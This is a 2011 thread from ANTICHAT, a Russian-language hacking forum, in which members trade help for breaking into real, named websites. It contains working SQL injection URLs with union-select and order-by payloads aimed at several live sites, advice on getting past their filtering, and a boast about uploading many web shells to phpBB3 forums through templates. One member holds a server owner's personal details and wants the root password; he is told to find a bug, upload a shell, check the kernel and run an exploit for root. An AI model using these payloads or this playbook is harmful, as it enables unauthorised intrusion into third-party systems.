HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #16521  
Старый 07.03.2011, 14:21
asql
Guest
Сообщений: n/a
Провел на форуме:
8829

Репутация: -3
По умолчанию

Лично для себя захотелось узнать, возможно ли провести sql'ку на

http://www.aratta-ukraine.com/sacred_ua.php?id=9999999

объясните плиз за +
 
Ответить с цитированием

  #16522  
Старый 07.03.2011, 15:08
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Jer1cho  
Jer1cho said:
Существует ли другой способ залить шелл в phpbb3 не используя стили?
шаблоны
 
Ответить с цитированием

  #16523  
Старый 07.03.2011, 15:22
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Какая здесь БД?

http://www.row2k.com/polls/index.cfm?cat=college&ID=-265+%6f%72%64%65%72+by+5+--+&type=USRowing%20Collegiate%20Poll
 
Ответить с цитированием

  #16524  
Старый 07.03.2011, 16:52
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Какая здесь БД?
http://www.row2k.com/polls/index.cfm?cat=college&ID=-265+%6f%72%64%65%72+by+5+--+&type=USRowing%20Collegiate%20Poll
MSSQL
 
Ответить с цитированием

  #16525  
Старый 07.03.2011, 18:54
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от Jer1cho  
Jer1cho said:
Ну я это и имел ввиду, в шаблонах при правке выдается ошибка, специфичная для первых версий bb3, ждать пока админ обновит форум нет желания)), поэтому ищу другой способ.
залил кучу шеллов таким образом на пхпбб3, никогда не появлялась ошибка..либо ты что то неправильно делаешь (что мало вероятно, так как там нет ничего сложного), либо мне не попадались такие форумы, кидай в пм посмотрим что сделать можно..
 
Ответить с цитированием

  #16526  
Старый 07.03.2011, 21:07
kAtze
Guest
Сообщений: n/a
Провел на форуме:
5967

Репутация: 0
По умолчанию

есть один сайт, расположенный на сервере, знаю на каком , знаю где находится датацентр, владельца доменных имён, его емайлы,знаю ФИО, мобильник, и какие фирмы на нём)) знаю что админ не закрыл доступ с разных айпи к серваку через ssh, надо узнать root пароль.

просканил сервак на файлы имеющиеся на нём.

одни их них

robots.txt HTTP 200 OK

.htaccess 302 Found

.htconfig 302 Found

.htpasswd 302 Found

однако конечно же они закрыты) может быть могут быть полезными

некоторые папки открытые, некоторые закрытые.

поставил BT4 r2, с чего Начать?)))

сайт проверять на дыры бесполезно. написан достаточно хорошо.

OS-FreeBSD на серваке
 
Ответить с цитированием

  #16527  
Старый 07.03.2011, 21:18
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

Цитата:
Сообщение от kAtze  
kAtze said:
есть один сайт, расположенный на сервере, знаю на каком , знаю где находится датацентр, владельца доменных имён, его емайлы,знаю ФИО, мобильник, и какие фирмы на нём)) знаю что админ не закрыл доступ с разных айпи к серваку через ssh, надо узнать root пароль.
просканил сервак на файлы имеющиеся на нём.
одни их них
robots.txt HTTP 200 OK
.htaccess 302 Found
.htconfig 302 Found
.htpasswd 302 Found
однако конечно же они закрыты) может быть могут быть полезными
некоторые папки открытые, некоторые закрытые.
поставил BT4 r2, с чего Начать?)))
сайт проверять на дыры бесполезно. написан достаточно хорошо.
OS-FreeBSD на серваке
ну рут пароль к сайту вряд ли относится каким то боком...в папке сайта ты 99,99% не найдешь ничего что может тебе дать рута на серванте..ищи баги, заливай шелл..узнавай версию ядра..юзай сплоит..получай рута..
 
Ответить с цитированием

  #16528  
Старый 08.03.2011, 14:22
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Не могу обойти фильтрацию.

http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
 
Ответить с цитированием

  #16529  
Старый 08.03.2011, 15:06
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Цитата:
Сообщение от FlaktW  
FlaktW said:
Не могу обойти фильтрацию.
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
Там двойной запрос:

http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10,11--+

Код:
Code:
SELECT * FROM root where p_id=-46 union select 1,2,3,4,5,6,7,8,9,10,11-- order by rank
http://www.funade.jp/english/course/detail.php?id=-46+union+select+1,2,3,4,5,6,7,8,9,10--+

Код:
Code:
SELECT * FROM `place` WHERE id=-46 union select 1,2,3,4,5,6,7,8,9,10-- order by up_date
Либо крути, как слепую с выводом в ошибку, либо: /showpost.php?p=1047515&postcount=48
 
Ответить с цитированием

  #16530  
Старый 08.03.2011, 16:18
FlaktW
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
Провел на форуме:
111014

Репутация: 8
По умолчанию

Цитата:
Сообщение от Tigger  
Tigger said:
либо: /showpost.php?p=1047515&postcount=48
Так как написано в этой статье вывести, не получается.

Сейчас попробую вывести через ошибку.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
 


Быстрый переход




ANTICHAT.XYZ